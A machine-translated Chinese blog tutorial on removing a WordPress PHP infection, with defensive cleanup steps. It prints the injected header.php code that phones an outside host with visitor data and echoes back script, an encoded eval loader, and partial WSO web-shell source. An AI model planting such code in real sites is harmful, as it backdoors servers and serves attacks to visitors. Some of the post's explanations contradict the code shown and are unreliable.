清除 WordPress PHP病毒

本教程介紹了一個博客的特殊情況 WordPress 它被感染了。 移動 WordPress PHP 病毒。

前幾天我注意到一個可疑代碼,似乎是 PHP 病毒 WordPress。 以下 PHP 代碼存在於 header.php, 行前 </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

這是一些 PHP 代碼,看起來像是嘗試從外部服務器檢索資源的內容,但引用 URL 的部分不完整。

工作機制稍微複雜一些,是這樣的 WordPress PHP 病毒對於受影響網站的訪問者來說是不可見的。 相反,它以搜索引擎(Google)為目標,並隱式導致受影響網站的訪問者數量顯著減少。

惡意軟件的詳細信息 WordPress PHP病毒

1.以上代碼存在於 header.php.

2.服務器上出現一個文件 wp-log.php 在文件夾中 wp-includes.

3. wp-log.php 包含加密代碼,但相對容易解密。

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

解密惡意軟件代碼 wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

這似乎是一個惡意 PHP 腳本,其中包含處理服務器上文件和目錄的身份驗證和操作的代碼。 可以很容易地看出該腳本包含如下變量 $auth_pass (認證密碼), $default_action (默認操作), $default_use_ajax (默認使用 Ajax)和 $default_charset (默認字符設置)。

顯然,該腳本有一個部分檢查 HTTP 用戶代理以阻止對某些 Web 機器人(例如搜索引擎)的訪問。 它還具有檢查 PHP 安全模式並設置某些工作目錄的部分。

4. 如果在瀏覽器中訪問wp-log.php,則會出現一個網頁,其中字段為 註冊。 乍一看,它似乎是一個文件管理器,通過它可以輕鬆地將新文件上傳到目標服務器。

如何對網站進行病毒清除 WordPress?

手動反病毒過程始終需要首先發現並了解漏洞是什麼。

1. 為整個網站生成備份。 這必須包括文件和數據庫。

2. 確定病毒大約存在了多長時間,並在大約的時間範圍內搜索 Web 服務器以查找修改過的或新創建的文件。

例如,如果您想查看文件 .php 上週創建或修改,在服務器中運行命令:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

這是一個簡單的方法,您可以通過它來發現文件 WordPress 受感染的和包含惡意軟件​​代碼的。

3.檢查文件 .htaccess 可疑指令。 權限行或腳本執行。

4.檢查數據庫。 某些帖子和頁面很可能 WordPress 被惡意軟件編輯或添加新的 具有以下角色的用戶 administrator.

5. 檢查文件夾和文件的寫入權限。 chmodchown.

建議的權限為:文件為 644,目錄為 755。

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6.更新全部 WordPress Plugins / WordPress Themes.

相關新聞: Fix Redirect WordPress Hack 2023(重定向病毒)

這些是對網站/博客進行病毒清除的“基本”方法 WordPress。 如果您遇到問題並需要幫助,評論部分已開放。

作為科技愛好者,我從2006年開始在StealthSettings.com上愉快地撰寫文章。我在操作系統方面有豐富的經驗,包括macOS、Windows和Linux,還熟悉編程語言和博客平台(WordPress),以及在線商店平台(WooCommerce、Magento、PrestaShop)。

如何 » WordPress » 清除 WordPress PHP病毒
發表評論